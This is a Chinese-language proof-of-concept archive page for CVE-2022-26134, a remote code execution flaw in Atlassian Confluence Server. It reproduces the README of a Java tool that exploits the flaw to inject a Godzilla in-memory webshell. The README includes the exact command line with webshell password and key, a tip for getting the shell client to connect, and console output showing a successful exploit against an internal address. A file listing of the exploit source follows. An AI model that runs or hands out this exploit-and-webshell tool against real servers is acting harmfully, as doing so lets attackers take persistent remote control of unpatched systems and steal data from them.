POC详情: ec3c10d26a5578beabe8187fac9395227a6eeef1

来源
关联漏洞
标题: Atlassian Confluence Server 注入漏洞 (CVE-2022-26134)
描述:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server 和 Data Center 存在注入漏洞。攻击者利用该漏洞执行任意代码。以下产品及版本受到影响:1.3.0版本至7.4.17之前版本、7.13.0版本至7.13.7之前版本、7.14.0版本至7.14.3之前版本、7.15.0版本至 7.15.2之前版本、7.16.0版本至7.16.4之
介绍
# CVE-2022-26134-Godzilla-MEMSHELL

## Usage
```
java -jar CVE-2022-26134.jar 哥斯拉密码 哥斯拉密钥

example
        java -jar CVE-2022-26134.jar pass key

```

如果内存Shell已经注入成功但哥斯拉无法连接,请在请求配置添加以下协议头或者为哥斯拉配置Burp代理
```
Connection: close
```


![image](https://user-images.githubusercontent.com/43266206/172345734-6cfd69f7-35d6-40a7-af80-4ce98dfbfe83.png)


```

C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key

C:\CVE_2022_26134_jar>

```

![image](https://user-images.githubusercontent.com/43266206/172345836-c1df504f-6f36-4fa2-8874-48750a4af291.png)
文件快照

[4.0K] /data/pocs/ec3c10d26a5578beabe8187fac9395227a6eeef1 ├── [ 500] CVE-2022-26134.iml ├── [4.0K] libs │   └── [832K] javassist-3.28.0-GA.jar ├── [ 820] README.md └── [4.0K] src ├── [4.0K] main │   ├── [ 900] 1.js │   ├── [3.6K] Main.java │   ├── [7.5K] MemShell.java │   └── [2.6K] MiTM.java └── [4.0K] META-INF └── [ 45] MANIFEST.MF 4 directories, 8 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。